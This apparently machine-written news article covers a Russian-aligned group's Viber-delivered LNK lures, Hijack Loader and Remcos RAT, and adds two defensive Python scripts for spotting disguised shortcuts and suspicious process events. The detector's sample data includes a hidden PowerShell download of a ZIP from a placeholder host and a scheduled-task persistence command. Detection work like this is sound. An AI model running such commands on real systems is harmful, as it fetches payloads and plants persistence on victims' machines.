Ethical Hacking News
Russian-aligned hackers have been using Viber as a platform to launch targeted attacks against Ukrainian military and government entities, highlighting an escalation of cyber warfare. The threat actor, known as UAC-0184 or Hive0156, has employed various tactics, including phishing emails, malware loaders, and remote administration tools to compromise systems.
Russian-aligned hackers are using Viber to launch targeted attacks against Ukrainian military and government entities. The hacking group, UAC-0184 or Hive0156, has been associated with malware distribution through messaging apps like Signal and Telegram. Viber is being used as an initial intrusion vector for distributing malicious ZIP archives containing Windows shortcut files disguised as official Microsoft documents. The attack chain employs techniques like DLL side-loading and module stomping to evade detection by security tools. The malware, Remcos RAT, enables attackers to manage the endpoint, execute payloads, monitor activities, and steal data.
In an alarming development, Russian-aligned hackers have been utilizing the popular messaging platform Viber to launch targeted attacks against Ukrainian military and government entities. According to recent findings from the 360 Threat Intelligence Center, this threat actor has been actively involved in conducting high-intensity intelligence gathering activities against Ukrainian departments in 2025.
The hacking group, known as UAC-0184 or Hive0156, has previously gained notoriety for utilizing war-themed lures in phishing emails to deliver Hijack Loader malware, which subsequently infects the victim's system with Remcos RAT. This particular threat actor is often associated with leveraging messaging apps like Signal and Telegram as a delivery vehicle for malware.
In this latest escalation, the group is using Viber as an initial intrusion vector to distribute malicious ZIP archives containing multiple Windows shortcut (LNK) files disguised as official Microsoft Word and Excel documents. The LNK files serve as decoy documents designed to lower the victim's suspicion while silently executing Hijack Loader in the background, fetching a second ZIP archive ("smoothieks.zip") from a remote server via a PowerShell script.
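The delivery described above rests on a ZIP archive whose members are shortcut files named to look like documents. The following triage script is an added example for defenders and is not code from the article or from 360 Threat Intelligence Center; it assumes nothing beyond the fixed Shell Link header defined in MS-SHLLINK, and the archive it scans is constructed inline for illustration. It flags any member that carries a .lnk extension or LNK header bytes, and raises the severity when the name uses a document-style double extension (the "Invoice.xlsx.lnk" pattern) or when LNK content hides under a non-.lnk name.

```python
import io
import zipfile
from typing import Optional

# Fixed Shell Link header prefix (MS-SHLLINK): HeaderSize 0x0000004C followed by
# LinkCLSID {00021401-0000-0000-C000-000000000046} in its on-disk byte order.
LNK_MAGIC = (b"\x4c\x00\x00\x00"
             b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")

# Document extensions a lure shortcut would typically impersonate (assumed list).
DOCUMENT_EXTS = (".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf")


def classify_entry(name: str, head: bytes) -> Optional[dict]:
    """Return a finding for one archive member, or None if it is not a shortcut.

    `head` is the first 20 bytes of the member; that is enough to recognise the
    fixed LNK header regardless of what the file name claims to be.
    """
    lower = name.rsplit("/", 1)[-1].lower()
    named_lnk = lower.endswith(".lnk")
    is_lnk = head.startswith(LNK_MAGIC)
    if not (named_lnk or is_lnk):
        return None

    reasons = []
    if is_lnk:
        reasons.append("shell-link header present")
    if named_lnk:
        reasons.append(".lnk extension")
    # Strip the .lnk suffix and check whether what remains looks like a document,
    # e.g. "Invoice.xlsx.lnk" -> "invoice.xlsx".
    stem = lower[:-4] if named_lnk else lower
    double_ext = stem.endswith(DOCUMENT_EXTS)
    if double_ext:
        reasons.append("document-style double extension")
    mismatch = is_lnk and not named_lnk
    if mismatch:
        reasons.append("LNK content under a non-.lnk name")

    severity = "high" if (double_ext or mismatch) else "medium"
    return {"name": name, "severity": severity, "reasons": reasons}


def triage_archive(zip_bytes: bytes) -> list:
    """Scan every member of a ZIP and return findings for shortcut files."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(len(LNK_MAGIC))
            finding = classify_entry(info.filename, head)
            if finding:
                findings.append(finding)
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample archive: one harmless member plus three shortcut variants."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Report_2025.docx", b"PK\x03\x04 placeholder document body")
        zf.writestr("Invoice.xlsx.lnk", LNK_MAGIC + b"\x00" * 60)   # disguised shortcut
        zf.writestr("Contract.pdf.lnk", LNK_MAGIC + b"\x00" * 60)   # disguised shortcut
        zf.writestr("Notes.docx", LNK_MAGIC + b"\x00" * 60)         # LNK bytes, wrong name
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_archive(build_sample_archive()):
        print(f"{f['severity']:6} {f['name']}: {', '.join(f['reasons'])}")
```

Checking the header bytes rather than trusting the extension is the point: a mail or chat gateway that only filters on ".lnk" misses a member whose name was chosen to look like a document, while a member that really is a shortcut cannot avoid starting with the header Windows requires to resolve it.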
The attack chain involves a multi-stage process that employs techniques like DLL side-loading and module stomping to evade detection by security tools. The loader scans the environment for installed security software, such as Kaspersky, Avast, BitDefender, AVG, Emsisoft, Webroot, and Microsoft, by calculating the CRC32 hash of the corresponding program.
Once it has established persistence via scheduled tasks, the loader subverts static signature detection before covertly executing Remcos RAT by injecting it into "chime.exe." This remote administration tool enables attackers to manage the endpoint, execute payloads, monitor activities, and steal data. According to the 360 Threat Intelligence Center, this particular malware has been frequently used by various malicious actors for cyber espionage and data theft activities.
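Two stages of the chain leave process-creation telemetry that a detection rule can key on: the PowerShell download of the second ZIP triggered by the shortcut, and the scheduled task used for persistence. The detector below is an added example, not code from the article or from 360 Threat Intelligence Center; it assumes Sysmon-style field names (Image, ParentImage, CommandLine, ProcessId), uses heuristics of my own (the download-verb list and the user-profile path pattern), and runs over constructed sample events rather than real telemetry. The host name in the sample command line is a placeholder.

```python
import re
from typing import Iterable, List

# Command-line fragments that indicate a download from PowerShell (assumed list).
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest",
                  "iwr ", "start-bitstransfer", "curl ", "wget ")

# Scheduled-task action living inside a user profile (assumed heuristic).
USER_PROFILE_RE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.IGNORECASE)


def check_event(ev: dict) -> List[str]:
    """Return the names of every rule a single process-creation event matches."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    hits = []

    # A double-clicked shortcut is resolved by Explorer, so the target process
    # has explorer.exe as its parent. PowerShell started that way, with a
    # download verb and a .zip in its command line, matches the chain above.
    if (image.endswith("\\powershell.exe")
            and parent.endswith("\\explorer.exe")
            and ".zip" in cmd
            and any(h in cmd for h in DOWNLOAD_HINTS)):
        hits.append("explorer-spawned PowerShell fetching ZIP")

    # schtasks /create whose action points into a user-writable profile path.
    if (image.endswith("\\schtasks.exe")
            and "/create" in cmd
            and USER_PROFILE_RE.search(cmd)):
        hits.append("scheduled task pointing into user profile")

    return hits


def detect(events: Iterable[dict]) -> List[dict]:
    """Run every rule over a stream of events and collect alerts in order."""
    alerts = []
    for ev in events:
        for rule in check_event(ev):
            alerts.append({"rule": rule,
                           "pid": ev.get("ProcessId"),
                           "cmd": ev.get("CommandLine")})
    return alerts


# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"ProcessId": 4010,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -c Get-ChildItem C:\Logs"},            # admin use, benign
    {"ProcessId": 4022,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -w hidden -c Invoke-WebRequest "
                    r"http://placeholder.invalid/smoothieks.zip -OutFile C:\Temp\s.zip"},
    {"ProcessId": 4031,
     "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"schtasks /create /tn OneDriveUpdate "
                    r"/tr C:\Users\victim\AppData\Roaming\chime.exe /sc minute /mo 5"},
    {"ProcessId": 4040,
     "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"schtasks /create /tn Backup /tr C:\Program Files\Backup\run.exe /sc daily"},
]


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] pid={a['pid']} cmd={a['cmd']}")
```

The parent-process condition is what keeps the first rule quiet for ordinary administrative PowerShell: the same download command launched from a terminal or a deployment tool has a different parent and is not flagged. The second rule deliberately ignores the task name, which an attacker picks freely, and looks only at where the action points.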
The use of Viber as a delivery vehicle for malicious ZIP archives highlights an evolution in the tactics employed by threat actors. As messaging apps continue to play a significant role in modern cybersecurity threats, it is essential for users to exercise increased vigilance when interacting with unfamiliar messages or attachments.
Related Information:
https://www.ethicalhackingnews.com/articles/Russias-Cyber-Warfare-Escalation-How-Viber-Became-a-Target-for-Ukrainian-Military-and-Government-ehn.shtml
Published: Mon Jan 5 12:21:20 2026 by llama3.2 3B Q4_K_M